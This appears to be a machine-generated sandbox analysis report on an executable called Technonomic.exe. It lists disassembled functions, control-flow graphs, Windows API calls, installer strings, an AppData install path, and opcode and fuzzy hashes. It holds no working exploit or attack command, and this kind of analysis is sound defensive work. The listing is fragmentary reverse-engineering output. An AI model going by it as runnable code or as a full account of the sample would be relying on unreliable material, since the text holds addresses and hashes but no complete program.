                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                      • API String ID: 900638850-905382516
                                                                                                                                                                      • Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                                                                      • Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
                                                                                                                                                                      • Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                                                                                      • Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 496 405974-40599a call 405c3f 499 4059b3-4059ba 496->499 500 40599c-4059ae DeleteFileW 496->500 502 4059bc-4059be 499->502 503 4059cd-4059dd call 406183 499->503 501 405b30-405b34 500->501 505 4059c4-4059c7 502->505 506 405ade-405ae3 502->506 509 4059ec-4059ed call 405b83 503->509 510 4059df-4059ea lstrcatW 503->510 505->503 505->506 506->501 508 405ae5-405ae8 506->508 511 405af2-405afa call 4064c6 508->511 512 405aea-405af0 508->512 513 4059f2-4059f6 509->513 510->513 511->501 520 405afc-405b10 call 405b37 call 40592c 511->520 512->501 516 405a02-405a08 lstrcatW 513->516 517 4059f8-405a00 513->517 519 405a0d-405a29 lstrlenW FindFirstFileW 516->519 517->516 517->519 521 405ad3-405ad7 519->521 522 405a2f-405a37 519->522 536 405b12-405b15 520->536 537 405b28-405b2b call 4052e2 520->537 521->506 524 405ad9 521->524 525 405a57-405a6b call 406183 522->525 526 405a39-405a41 522->526 524->506 538 405a82-405a8d call 40592c 525->538 539 405a6d-405a75 525->539 528 405a43-405a4b 526->528 529 405ab6-405ac6 FindNextFileW 526->529 528->525 534 405a4d-405a55 528->534 529->522 533 405acc-405acd FindClose 529->533 533->521 534->525 534->529 536->512 540 405b17-405b26 call 4052e2 call 406024 536->540 537->501 549 405aae-405ab1 call 4052e2 538->549 550 405a8f-405a92 538->550 539->529 541 405a77-405a80 call 405974 539->541 540->501 541->529 549->529 553 405a94-405aa4 call 4052e2 call 406024 550->553 554 405aa6-405aac 550->554 553->529 554->529
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 0040599D
                                                                                                                                                                      • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 004059E5
                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A08
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A0E
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405A1E
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405ACD
                                                                                                                                                                      Strings
                                                                                                                                                                      • \*.*, xrefs: 004059DF
                                                                                                                                                                      • "C:\Users\user\Desktop\Technonomic.exe", xrefs: 0040597D
                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
                                                                                                                                                                      • PWB, xrefs: 004059CD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Technonomic.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
                                                                                                                                                                      • API String ID: 2035342205-3697548252
                                                                                                                                                                      • Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                                                                      • Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
                                                                                                                                                                      • Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
                                                                                                                                                                      • Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                                                                                      • Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
                                                                                                                                                                      • Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                                                                                      • Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00402154
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
                                                                                                                                                                      • API String ID: 542301482-550679374
                                                                                                                                                                      • Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                                                                      • Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                                                                      • Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 004064D1
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                      • Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                                                                      • Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
                                                                                                                                                                      • Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                                                                      • Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                      • Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                                                                      • Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 186 403d6f-403d81 187 403ec2-403ed1 186->187 188 403d87-403d8d 186->188 190 403f20-403f35 187->190 191 403ed3-403f1b GetDlgItem * 2 call 404247 SetClassLongW call 40140b 187->191 188->187 189 403d93-403d9c 188->189 192 403db1-403db4 189->192 193 403d9e-403dab SetWindowPos 189->193 195 403f75-403f7a call 404293 190->195 196 403f37-403f3a 190->196 191->190 198 403db6-403dc8 ShowWindow 192->198 199 403dce-403dd4 192->199 193->192 203 403f7f-403f9a 195->203 201 403f3c-403f47 call 401389 196->201 202 403f6d-403f6f 196->202 198->199 204 403df0-403df3 199->204 205 403dd6-403deb DestroyWindow 199->205 201->202 223 403f49-403f68 SendMessageW 201->223 202->195 208 404214 202->208 209 403fa3-403fa9 203->209 210 403f9c-403f9e call 40140b 203->210 214 403df5-403e01 SetWindowLongW 204->214 215 403e06-403e0c 204->215 212 4041f1-4041f7 205->212 211 404216-40421d 208->211 219 4041d2-4041eb DestroyWindow EndDialog 209->219 220 403faf-403fba 209->220 210->209 212->208 217 4041f9-4041ff 212->217 214->211 221 403e12-403e23 GetDlgItem 215->221 222 403eaf-403ebd call 4042ae 215->222 217->208 225 404201-40420a ShowWindow 217->225 219->212 220->219 226 403fc0-40400d call 4061a5 call 404247 * 3 GetDlgItem 220->226 227 403e42-403e45 221->227 228 403e25-403e3c SendMessageW IsWindowEnabled 221->228 222->211 223->211 225->208 256 404017-404053 ShowWindow KiUserCallbackDispatcher call 404269 EnableWindow 226->256 257 40400f-404014 226->257 231 403e47-403e48 227->231 232 403e4a-403e4d 227->232 228->208 228->227 234 403e78-403e7d call 404220 231->234 235 403e5b-403e60 232->235 236 403e4f-403e55 232->236 234->222 237 403e96-403ea9 SendMessageW 235->237 239 403e62-403e68 235->239 236->237 238 403e57-403e59 236->238 237->222 238->234 242 403e6a-403e70 call 40140b 239->242 243 403e7f-403e88 call 40140b 239->243 252 403e76 242->252 243->222 253 403e8a-403e94 243->253 252->234 253->252 260 404055-404056 256->260 261 404058 256->261 257->256 262 40405a-404088 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 40408a-40409b SendMessageW 262->263 264 40409d 262->264 265 4040a3-4040e1 call 40427c call 406183 lstrlenW call 4061a5 SetWindowTextW call 401389 263->265 264->265 265->203 274 4040e7-4040e9 265->274 274->203 275 4040ef-4040f3 274->275 276 404112-404126 DestroyWindow 275->276 277 4040f5-4040fb 275->277 276->212 279 40412c-404159 CreateDialogParamW 276->279 277->208 278 404101-404107 277->278 278->203 280 40410d 278->280 279->212 281 40415f-4041b6 call 404247 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->208 281->208 286 4041b8-4041cb ShowWindow call 404293 281->286 288 4041d0 286->288 288->212
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403DC8
                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403DDC
                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403E19
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E34
                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403EE2
                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EEC
                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FFD
                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040401E
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 0040404B
                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404068
                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
                                                                                                                                                                      • lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
                                                                                                                                                                      • SetWindowTextW.USER32(?,00423748), ref: 004040D0
                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                      • String ID: H7B
                                                                                                                                                                      • API String ID: 3282139019-2300413410
                                                                                                                                                                      • Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                                                                      • Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
                                                                                                                                                                      • Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                                                                      • Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 289 4039cc-4039e4 call 406559 292 4039e6-4039f6 call 4060ca 289->292 293 4039f8-403a2f call 406050 289->293 302 403a52-403a7b call 403ca2 call 405c3f 292->302 298 403a31-403a42 call 406050 293->298 299 403a47-403a4d lstrcatW 293->299 298->299 299->302 307 403a81-403a86 302->307 308 403b0d-403b15 call 405c3f 302->308 307->308 309 403a8c-403ab4 call 406050 307->309 314 403b23-403b48 LoadImageW 308->314 315 403b17-403b1e call 4061a5 308->315 309->308 316 403ab6-403aba 309->316 318 403bc9-403bd1 call 40140b 314->318 319 403b4a-403b7a RegisterClassW 314->319 315->314 320 403acc-403ad8 lstrlenW 316->320 321 403abc-403ac9 call 405b64 316->321 332 403bd3-403bd6 318->332 333 403bdb-403be6 call 403ca2 318->333 322 403b80-403bc4 SystemParametersInfoW CreateWindowExW 319->322 323 403c98 319->323 327 403b00-403b08 call 405b37 call 406183 320->327 328 403ada-403ae8 lstrcmpiW 320->328 321->320 322->318 326 403c9a-403ca1 323->326 327->308 328->327 331 403aea-403af4 GetFileAttributesW 328->331 336 403af6-403af8 331->336 337 403afa-403afb call 405b83 331->337 332->326 342 403bec-403c06 ShowWindow call 4064ed 333->342 343 403c6f-403c70 call 4053b5 333->343 336->327 336->337 337->327 350 403c12-403c24 GetClassInfoW 342->350 351 403c08-403c0d call 4064ed 342->351 347 403c75-403c77 343->347 348 403c91-403c93 call 40140b 347->348 349 403c79-403c7f 347->349 348->323 349->332 352 403c85-403c8c call 40140b 349->352 355 403c26-403c36 GetClassInfoW RegisterClassW 350->355 356 403c3c-403c5f DialogBoxParamW call 40140b 350->356 351->350 352->332 355->356 360 403c64-403c6d call 40391c 356->360 360->326
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                                                        • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00403A4D
                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420), ref: 00403ACD
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
